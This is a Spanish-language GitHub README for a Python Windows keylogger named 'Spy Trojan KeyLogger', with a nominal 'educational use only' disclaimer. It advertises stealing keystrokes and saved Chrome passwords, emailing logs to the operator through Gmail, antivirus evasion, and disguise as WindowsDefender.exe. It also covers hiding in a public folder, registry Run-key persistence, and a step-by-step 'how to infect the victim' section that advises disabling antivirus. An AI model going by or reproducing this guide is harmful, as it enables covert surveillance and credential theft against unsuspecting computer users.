/SpyTrojan_Keylogger

Troyano espía, Keylogger para Windows, se replica en el sistema y se inicia automaticamente al iniciar sesión. Envía los datos mediante Gmail

Primary LanguagePythonMIT LicenseMIT

█▀ █▀█ █▄█   ▀█▀ █▀█ █▀█ ░░█ ▄▀█ █▄░█   █▄▀ █▀▀ █▄█ █░░ █▀█ █▀▀ █▀▀ █▀▀ █▀█
▄█ █▀▀ ░█░   ░█░ █▀▄ █▄█ █▄█ █▀█ █░▀█   █░█ ██▄ ░█░ █▄▄ █▄█ █▄█ █▄█ ██▄ █▀▄ v3.3.3
  • Nombre: Spy Trojan KeyLogger
  • Versión: 3.4.0
  • Documentación: 17/05/2020
  • Plataforma: Windows 7, 8.1 y 10
  • Lenguaje:Python 3.8

Nota importante: Esta herramienta tiene como proposito general y de uso exclusivo para aprendizaje, se creó como parte de un curso Online de hacking de "Seguridad de sistemas informáticos", no me hago responsable de un posible mal uso de ésta herramienta.

Las razones por las cuales existen los Keyloggers, tienen como fin la seguridad de una empresa ya sea que estén viendo qué está haciendo el personal, cómo interactúan sus personas en las computadoras o que los atacantes intenten obtener información confidencial, como información de inicio de sesión u otros datos confidenciales. Este programa simplemente toma cada pulsación de tecla ingresada en el teclado y luego envía el archivo de registro por correo electrónico cada 2 horas.

Carpeta Principal

Archivos

  • Doc = Documentación de como perzonalizar el keylogger CustomKey.md
  • Compile.bat = Convierte el script *.py a *.exe
  • DataCompartir.txt = Pequeña descripción del keylogger
  • Ejecutar.bat = Ejecuta el script - [para pruebas]
  • icon.ico = Icono Windows Defender
  • LICENCE = Licencia
  • README.md= Documentación
  • version.txt = Información detalla de conversión .py a .exe
  • WindowsDefender.exe = Keylogger Compilado 3.2.0
  • WindowsDefender.py = Código fuente del Keylogger

Caracteristicas

  • Indetectable Antivirus: Windows Defender 02/05/2020, Avast, ESET NOD32

  • Envío por Gmail: Envía el registro de teclas por Gmail en un .k.

    Correo ejemplo del Keylogger

  • Recibe datos por varios correos: Hay una posibilidad de agregar 1 o más correos, y así el registro de teclas se envíe a varios correos a la vez.

  • Obtiene contraseñas guardadas en Google Chrome: Obtiene todas las contraseñas guardadas de Google chrome .

  • Verifica conexión a internet: El keylogger verifica si la computadora está conectada a internet, y si ese es el caso envía los datos, en caso contrario, no lo envía,

  • Tiempo de envío personalizado: Usted puede elegir un intervalo de tiempo personalizado, en la cual desea que se envíe los archivos, No se recomienta que sean muy seguidos, ya que el servidor de mensajería de google, bloqueará la cuenta por 1 día, por eso el tiempo de intervalo de envío escogida es de 2 Horas, éstas horas se cuentan despues de iniciar el script

  • Obtención de datos a prueba de errores: En otros keylogger al momento de enviar el .k, éste proceso demora entre 3 a 5 segundos, y en ese transcurso de tiempo el keylogger no obtiene el registro de teclas, en éste keylogger, ese error está solucionado.

  • Segundo plano: Este keylogger, al ejecutarse en la linea de comando, sí mostrará una consola, solo por detalles de debuggeo, pero al ser compilada de *.py a *.exe el ejecutable resultante se ejecutará en segundo plano

  • Disfraz: Al momento de ser convertido de *.py a *.exe. El Keylogger será disfrazado como WindowsDefender.exe con el ícono y la información del programa.

  • Oculto: El Keylogger al iniciar se copia (Solo si ya está en un archivo *exe) a la carpeta "C:\Users\Public\Security\Windows Defender\" , y en esa carpeta encuentras el archivo .k.

  • Iniciar automaticamente con el sistema: Modifica el registro de windows

  • Segundo Gmail en caso de Error: En casó el correo principal sea bloqueada o tenga x problemas, se usará un segundo correo.

Caracteristicas en futuras actualizaciones:

  • Conexión a una base de datos MySQL: Los datos recopilados serán enviados por una conexión a una base de datos en vez de por mensajes.
  • Soporte de envió a otros buzones de correo: Se insertará un soporte para poder usar Outlook, yahoo u otros servicios de correo
  • Conexión FTP: Envía el archivo .k vía FTP.
  • Envía datos mediante FTP: enviará documentos, fotos y videos mediante una conexión FTP, en segundo plano.
  • Contraseñas de Wifi: Obtiene contraseñas guardadas en una laptop o PC
  • Portapapeles: Obtiene el texto del portapapeles.

Uso de Recursos de la PC

El programa se repite 2 veces ya que ésta utiza 2 hilos de ejecución

Uso del CPU y RAM

Proceso de preparación:

Requerimiento de paquetes de Python3.8:

  • import pynput
  • import getuser
  • import datetime
  • import os
  • import time
  • import yagmail
  • import socket
  • import threading
  • import pyinstaller

Pasos para elegir su correo

  1. Es de suma urgencia habilitar el acceso a apps menos seguras de google, la cual lo puedes hacer desde éste link. En caso no lo habilites, el keylogger no podrá iniciar sesión en su Gmail

  2. Use git clone https://github.com/SebastianEPH/SpyTrojan_Keylogger.git para descargar el repositorio en su computadora.

  3. Abra el archivo WindowsDefender.py en su editor de texto.

  4. Entre al codigo y busca la ZONA CUSTOM y modifique el Correo primario y el Correo segundario, luego rellene el o los Correos que receptores

# **************************************   ZONA CUSTOM   *********************************


# Correo de envío [Primaria] 
def emailP():                   # <<== Cambia éste correo
    return "Send123@gmail.com" 
def passP():                    # <<== Contraseña del correo
    return "contraseña1"

# Correo de envío [Segundaria]     <=> Solo si hay algún problema de envío con el correo Principal
def emailS():                   # <<== Cambia éste correo
    return "Sendabc@gmail.com"
def emailP():                   # <<== Contraseña del correo 
    return "contraseña2"


#Correos que recibirán los archivos log
def ReceiveE():
    #return ["Recibe1@gmail.com", "Recibe2@hotmail.com", "Recibe3@yahoo.com"]   # MultiCorreo
    return ["Recibe1@gmail.com"]                                                # MonoCorreo

# ***************************************   FIN ZONA CUSTOM   *******************************

Si usted desea modificar el keylogger lea la siguiente documentación aquí.

Método de infección:

¿Cómo infecto a la victima?

Final files

Nota: No cambiar de nombre al archivo WindowsDefender.exe, si usted le cambia el nombre, el Keylogger quedará obsoleto.

  • Usten guardará el archivo en un USB.
  • Conectará el USB a la [PC] a infectar.
  • Se recomienda desactivar el antivirus o agregar una exclusión en al siguiente ruta: "C:\Users\Public\Security\Windows Defender".
  • Lo siguiente es ejecutar el archivo WindowsDefender.exe en el USB, el Keylogger se replicará en la siguiente ruta "C:\Users\Public\Security\Windows Defender", Se recomienda no sacar el USB al instante ya que el Keylogger se estará replicando en la ruta.

NOTA: Al ejecutar el archivó, ésta automaticamente modificará el registro de windows para que se inicie siempre al prender la computadora.

El Keylogger tKeyloggerará de modificar la siguiente ruta del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" por lo cual necesitará permisos de administrador, por ende se recomienda que la primera ejecución se realice con permisos de administrador, en caso de que no lo ejecute con permisos de administrador, el Keylogger modificará la siguiente ruta "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

Explicación:

  • HKEY_LOCAL_MACHINE: El Keylogger se ejecutará en todos los usuarios exitentes y los nuevos usuarios de la computadora
  • HKEY_CURRENT_USER: El Keylogger solo se ejecutará en el usuario actual, si se llegará a crear otro usuario, el Keylogger Solo funcionará en el usuario principal

By SebastianEPH